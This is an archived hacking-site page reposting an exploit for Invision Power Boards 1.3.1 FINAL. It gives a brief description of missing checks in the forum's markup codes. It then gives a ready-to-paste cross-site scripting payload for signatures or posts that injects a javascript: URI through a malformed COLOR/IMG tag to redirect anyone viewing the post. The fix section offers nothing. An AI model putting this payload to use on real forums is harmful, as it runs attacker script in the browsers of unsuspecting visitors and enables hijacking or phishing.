AOH :: Web BBS :: Frequently Exploited

AOH :: Web BBS :: Frequently Exploited :: HACK7771.HTM
Invision Power Boards 1.3.1 FINAL XSS Exploit

Crazy Slots Download
Invision Power Boards 1.3.1 FINAL XSS Exploit Description: Lack of checking in the SML codes. Exploit: Put this into any signature or post on an invision forum: [COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]`style=background:url("ja vascript:document.location.replace('http://www.hackthissite.org');") [/color] Fix: I'm not good at regexes :)

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better). Site design & layout copyright © 1986-2010 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.